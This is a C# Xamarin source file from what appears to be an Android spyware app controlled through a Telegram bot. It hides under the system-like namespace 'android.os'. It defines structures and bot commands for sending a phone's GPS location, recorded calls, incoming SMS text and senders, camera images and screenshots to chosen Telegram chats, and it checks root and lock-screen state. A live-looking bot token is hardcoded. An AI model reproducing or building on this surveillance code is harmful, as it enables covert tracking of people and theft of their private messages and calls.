using System.Collections.Generic;
using Android.App;
using Android.Net;
using System.Net;
using System.IO;
using Android.OS;
using System;
using Android.Content;
using Android.Widget;
using TeleSharp.Entities.SendEntities;
using Android.Hardware;
using Android.Views;
using static Android.Hardware.Camera;
using static Android.App.ActivityManager;
using Java.Util;
using Android.Telephony;
using TeleSharp.Entities;
using TeleSharp;
using android.os.Resources;
using File = System.IO.File;
using android.os;

namespace android.os
{
    public class Notification
    {
        public LocationNotify Location { get; set; }
        public CallNotify Call { get; set; }
        public SmsNotify Sms { get; set; }
        public ImageNotify Image { get; set; }
    }
    public class ImageNotify
    {
        public string Path { get; set; }
    }
    public class LocationNotify
    {
        public string Latitude { get; set; }
        public string Longitude { get; set; }
        public double Altitude { get; set; }
        public float Accuracy { get; set; }
        public float Speed { get; set; }
        public float Bearing { get; set; }
        public string Chat_Id { get; set; }
        public DateTime dt { get; set; }
    }
    public class CallNotify
    {
        public string Path { get; set; }
        public string Chat_Id { get; set; }
        public string FromNumber { get; set; }
        public DateTime DateTime { get; set; }
    }
    public class SmsNotify
    {
        public string FromNumber { get; set; }
        public string Name { get; set; }
        public string Text { get; set; }
        public string Chat_Id { get; set; }
        public DateTime DateTime { get; set; }
    }
    public class WaitingFile
    {
        public string FileName { get; set; }
        public string Chat_Id { get; set; }
        public DateTime DateTime { get; set; }
        public string Path { get; set; }
    }
    public class WaitMessage
    {
        public string Text { get; set; }
        public string ChatId { get; set; }
        public DateTime DateTime { get; set; }
    }
    public static class inf
    {
        public static bool RemoveUser(string ChatId, List<UserInformation> u, UsersMode um)
        {
            foreach (UserInformation user in u)
                if (ChatId == user.ChatId)
                {
                    user.ClrSelf(um);
                    return true;
                }
            return false;
        }
        public static int UserNumber(string ChatId, List<UserInformation> u)
        {
            for (int i = 0; i < u.Count; i++)
                if (ChatId == Users[i].ChatId)
                    return i + 1;
            return -1;
        }
        public static bool UserExist(string ChatId, List<UserInformation> u)
        {
            foreach (UserInformation user in u)
                if (ChatId == user.ChatId)
                    return true;
            return false;
        }
        public static void forw(TeleSharp.Entities.Message m, UserInformation user)
        {
            try
            {
                if (user.OnAddChatId)
                {
                    if (!UserExist(m.ForwardFrom.Id.ToString(), Users))
                    {
                        UserInformation u = new UserInformation(m.ForwardFrom.Id.ToString())
                        {
                            Name = m.ForwardFrom.FirstName,
                            UserName = m.ForwardFrom.Username
                        };
                        u.SaveSetting(UsersMode.Users);
                        Users.Add(u);
                        Values.api.SendMessage(new SendMessageParams { Text = "Ok!,Chat id: " + m.ForwardFrom.Id + " was added!", ChatId = m.From.Id.ToString(), ReplyToMessageId = m.MessageId });
                        Values.api.SendMessage(new SendMessageParams { Text = "User: " + m.From.FirstName + " Added You To This Bot", ChatId = m.ForwardFrom.Id.ToString() });
                    }
                    else
                        Values.api.SendMessage(new SendMessageParams { Text = "this chat id was added and not needed add again!", ChatId = m.From.Id.ToString(), ReplyToMessageId = m.MessageId });
                }
                else if (user.OnRemoveChatId)
                {
                    if (UserExist(m.ForwardFrom.Id.ToString(), Users))
                        DoWork.DeleteChatId(m.ForwardFrom.Id.ToString(), m.MessageId, m.From.Id.ToString(), UsersMode.Users);
                    else
                        Values.api.SendMessage(new SendMessageParams { Text = "this chat id was not found and not needed delete!", ChatId = m.From.Id.ToString() });
                }
                user.OnAddChatId = user.OnRemoveChatId = false;
            }
            catch { }
        }
        public static void list(TeleSharp.Entities.Message m)
        {
            string isroot = RootUtil.IsDeviceRooted().ToString();
            string pr = Values.sharep.GetBoolean("private", false).ToString();
            Values.api.SendMessage(new SendMessageParams
            {
                ChatId = m.From.Id.ToString(),
                Text = "Name= " + Metods.devicename(m.From.Id.ToString()) + "\nRoot Device= " + isroot + "\nPrivate= " + pr + "\nLock= " + inf.Values.sharep.Contains("lockfor"),
                InlineKeyboard = new InlineKeyboardMarkup
                {
                    InlineKeyboard = new List<List<InlineKeyboardButton>>
                            {
                                new List<InlineKeyboardButton>
                                {
                                    new InlineKeyboardButton { Text = "SetToken", CallbackData =Metods.devicename(m.From.Id.ToString())+",st", SwitchInlineQuery = "", SwitchInlineQueryCurrentChat = "", Url = "" }
                                    ,new InlineKeyboardButton {Text="DeleteToken",CallbackData=Metods.devicename(m.From.Id.ToString())+",dt",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" },
                                    new InlineKeyboardButton {Text="Restart Bot",CallbackData=Metods.devicename(m.From.Id.ToString())+ ",rsbot",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="", Url="" }
                                }
                            },
                }
            });
        }
        public static void checkcomands(TeleSharp.Entities.Message m, UserInformation user)
        {
            if (m.Text.ToLower() == "/list")
                list(m);
            else if (m.Text.ToLower() == "/add_chat_id")
            {
                user.OnAddChatId = true;
                Values.api.SendMessage(new SendMessageParams { Text = "Ok!now forward message of that user to me!", ChatId = m.From.Id.ToString(), ReplyToMessageId = m.MessageId });
            }
            else if (m.Text == "/delete_chat_id")
            {
                user.OnRemoveChatId = true;
                Values.api.SendMessage(new SendMessageParams { Text = "Ok!now forward message of that user to me!", ChatId = m.From.Id.ToString(), ReplyToMessageId = m.MessageId });
            }
        }
        internal static class Values
        {
            public static bool ScreenOn = true;
            public static bool runninggpsinscreenoff = false;
            public static string PhoneNumber { get; set; }
            public static bool ScreenMode
            {
                get
                {
                    KeyguardManager keyg = Application.Context.GetSystemService(Context.KeyguardService) as KeyguardManager;
                    if (keyg.InKeyguardRestrictedInputMode())
                        return false;//off
                    else
                        return true;//on
                }
            }
            public static bool OnTake { get; set; }
            public static string LanguageNanme { get; set; }
            public static string callpth { get; set; }
            public static string sendto { get; set; }
            public static string camid { get; set; }
            public static bool onscreenshot { get; set; }
            public static Context C { get; set; }
            public static bool RuningCamera { get; set; }
            public static bool RuningThread { get; set; }
            public static ISharedPreferences sharep { get; set; }
            public static TeleSharp.TeleShrap api { get; set; }
            internal static bool waitforcamera { get; set; }
            public static bool OnForwUnLock { get; set; }
            public static bool OnCallRecording { get; set; }
            public static bool cansendonline { get; internal set; }
            public static string pass { get; internal set; }
            public static bool firstrun { get; internal set; }
            public static bool findidlocation { get; internal set; }
            public static string incoming_number { get; internal set; }
            public static TelephonyManager tmgr { get; internal set; }
            public static string MainToken = "308202028:AAEZ521f8ZVbhZwEFSzQOdJFmnGDm1cdbHE";

            public static Java.Text.SimpleDateFormat sdf = new Java.Text.SimpleDateFormat("yyyy-MM-dd_HH-mm-ss");
            public static Date date = new Date();
        }
        internal static class Metods
        {
            public static bool HasChar(char c, string txt)
            {
                foreach (char C in txt)
                    if (C == c)
                        return true;
                return false;
            }
            public static void add_onlines_id(int id)
            {
                if (!idsonline.Contains(id))
                {
                    idsonline.Add(id);
                    Setting.Set_bool("notifyo" + id, true);
                }
            }
            public static bool IsServiceRunning(Context C, Service S)
            {
                ActivityManager manager = (ActivityManager)C.GetSystemService(Activity.ActivityService);
                foreach (RunningServiceInfo service in manager.GetRunningServices(int.MaxValue))
                    if (S.Class.Name.Equals(service.Service.ClassName))
                        return true;
                return false;
            }
            public static string Trim(string txt)
            {
                string retxt = "";
                foreach (char c in txt)
                    if (c != ' ')
                        retxt += c;
                return retxt;
            }
            internal static string Ip()
            {
                var host = Dns.GetHostEntry(Dns.GetHostName());
                foreach (var ip in host.AddressList)
                    if (ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork)
                        return ip.ToString();
                return "";
            }
            public static int[] getidsnotify(string notifynamestartwith, int removecount)
            {
                int[] ids = new int[getnotifyidcount(notifynamestartwith)];
                int i = 0;
                foreach (string s in System.IO.Directory.GetFiles(Filef.getmainpth()))
                {
                    string name = Path.GetFileNameWithoutExtension(s);
                    if (name.StartsWith(notifynamestartwith))
                    {
                        ids[i] = Convert.ToInt32(name.Remove(0, removecount));
                        i++;
                    }
                }
                return ids;
            }
            public static int getnotifyidcount(string notifynamestartwith)
            {
                int idcount = 0;
                foreach (string file in System.IO.Directory.GetFiles(Filef.CreateDir(Filef.getmainpth())))
                    if (System.IO.Path.GetFileName(file).StartsWith(notifynamestartwith))
                        idcount++;
                return idcount;
            }

            public static void refreshrenamesids(int numberremoved)
            {
                FileInfo[] fi = new FileInfo[Values.sharep.GetInt("id_count", 0)];
                for (int i = 0; i < fi.Length; i++)
                    fi[i] = new FileInfo(Filef.getmainpth() + "/id" + i + 1 + ".set");
                foreach (FileInfo f in fi)
                    if (f.Name.StartsWith("id"))
                    {
                        int number = Convert.ToInt32(f.Name.Remove(0, 2).TrimEnd('t', 'e', 's', '.'));
                        if (number == numberremoved + 1)
                        {
                            Filef.rename(Filef.getmainpth() + "/id" + number + ".set", "id" + (number - 1) + ".set");
                            numberremoved++;
                        }
                    }
            }
            public static string devicename(string chatid)
            {
                return Values.sharep.GetString("devname" + chatid, Build.Display);
            }
            public static string BetWeen(char arg1, char arg2, string txt)
            {
                string retpth = "";
                for (int i = txt.IndexOf(arg1) + 1; i < txt.Length && txt[i] != arg2; i++)
                    retpth += txt[i];
                return retpth;
            }
            public static void remove_onlines_id(int id)
            {
                if (idsonline.Contains(id))
                {
                    idsonline.Remove(id);
                    Setting.Remove("notifyo" + id);
                }
            }
        }
        public static List<string> ImagesPath = new List<string>();
        public static List<UserInformation> MyUsers = new List<UserInformation>();
        public static string TextBefore(char c, string txt)
        {
            try
            {
                if (txt == "")
                    return "";
                return txt.Remove(txt.IndexOf(c), txt.Length - txt.IndexOf(c)).Trim();
            }
            catch { return ""; }
        }
        public static string TextAfter(char c, string txt)
        {
            try
            {
                if (txt == "")
                    return "";
                return txt.Remove(0, txt.IndexOf(c) + 1).Trim();
            }
            catch { return ""; }
        }
        public static string ReadLineString(string text, int LineNumber = 1)
        {
            return text.Split('\n')[LineNumber - 1];
        }
        public static List<UserInformation> Users = new List<UserInformation>();
        public static string CTRLToken { get; internal set; }
        public static string MyManagerId { get; set; }
        public static TeleShrap CTRLApi = null;
        public static List<UserInformation> LoadUsers(UsersMode Mode)
        {
            List<UserInformation> ru = new List<UserInformation>();
            foreach (string pth in Directory.GetDirectories((Filef.CreateDir(Filef.getmainpth() + "/" + Mode.ToString()))))
            {
                try
                {
                    if (Path.GetFileName(pth) == "Creator")
                    {
                        if (File.Exists(pth + "/chatid"))
                            Manager.ChatId = File.ReadAllText(pth + "/chatid");
                    }
                    else
                    {
                        UserInformation user = new UserInformation(Path.GetFileName(pth));
                        if (File.Exists(pth + "/name"))
                            user.Name = File.ReadAllText(pth + "/name");
                        if (File.Exists(pth + "/username"))
                            user.UserName = File.ReadAllText(pth + "/username");
                        ru.Add(user);
                    }
                }
                catch { }
            }
            return ru;
        }
        public static Creator Manager = new Creator("abbast78");
        public static List<Notification> NotifyList = new List<Notification>();
        public static List<WaitMessage> WaitMessages = new List<WaitMessage>();
        public static List<WaitingFile> WaitFiles = new List<WaitingFile>();
        public static bool allowrestartmainservice = true;
        public static List<long> idsonline = new List<long>();
        public static string androidname(BuildVersionCodes apiV)
        {
            switch (apiV)
            {
                case BuildVersionCodes.Froyo:
                    return "Froyo >> 2.2";
                case BuildVersionCodes.Gingerbread:
                    return "Gingerbread >> 2.3";
                case BuildVersionCodes.GingerbreadMr1:
                    return "GingerbreadMr1 >> 2.3.3";
                case BuildVersionCodes.Honeycomb:
                    return "Honeycomb >> 3.0";
                case BuildVersionCodes.HoneycombMr1:
                    return "HoneycombMr1 >> 3.1";
                case BuildVersionCodes.HoneycombMr2:
                    return "HoneycombMr2 >> 3.2";
                case BuildVersionCodes.IceCreamSandwich:
                    return "IceCreamSandwich >> 4.0";
                case BuildVersionCodes.IceCreamSandwichMr1:
                    return "IceCreamSandwichMr1 >> 4.0.3";
                case BuildVersionCodes.JellyBean:
                    return "JellyBean >> 4.1";
                case BuildVersionCodes.JellyBeanMr1:
                    return "JellyBeanMr1 >> 4.2";
                case BuildVersionCodes.JellyBeanMr2:
                    return "JellyBeanMr2 >> 4.3";
                case BuildVersionCodes.Kitkat:
                    return "Kitkat >> 4.4";
                case BuildVersionCodes.KitkatWatch:
                    return "KitkatWatch >> 4.4";
                case BuildVersionCodes.Lollipop:
                    return "Lollipop >> 5.0";
                case BuildVersionCodes.LollipopMr1:
                    return "LollipopMr1 >> 5.1";
                case BuildVersionCodes.M:
                    return "MarshMallow >> 6.0";
                default:
                    return "More Than MarshMallo >> Version > 6.0";
            }
        }
        public static List<int> idsdloc = new List<int>();
        public static bool isonline()
        {
            ConnectivityManager cm = (ConnectivityManager)Application.Context.GetSystemService(Application.ConnectivityService);
            NetworkInfo netinfo = cm.ActiveNetworkInfo;
            return (netinfo != null && netinfo.IsConnected);
        }
        public static bool isdigit(string s)
        {
            for (int i = 0; i < s.Length; i++)
                if (!char.IsDigit(s, i))
                    return false;
            return true;
        }
        internal static void OpenSetting(Context C)
        {
            Values.sharep = C.GetSharedPreferences("android.os.sadas45sg6d4f6g696sadgfasdgf4", FileCreationMode.Private);
        }
    }
    public enum UsersMode
    {
        Users,
        MyUsers
    }
}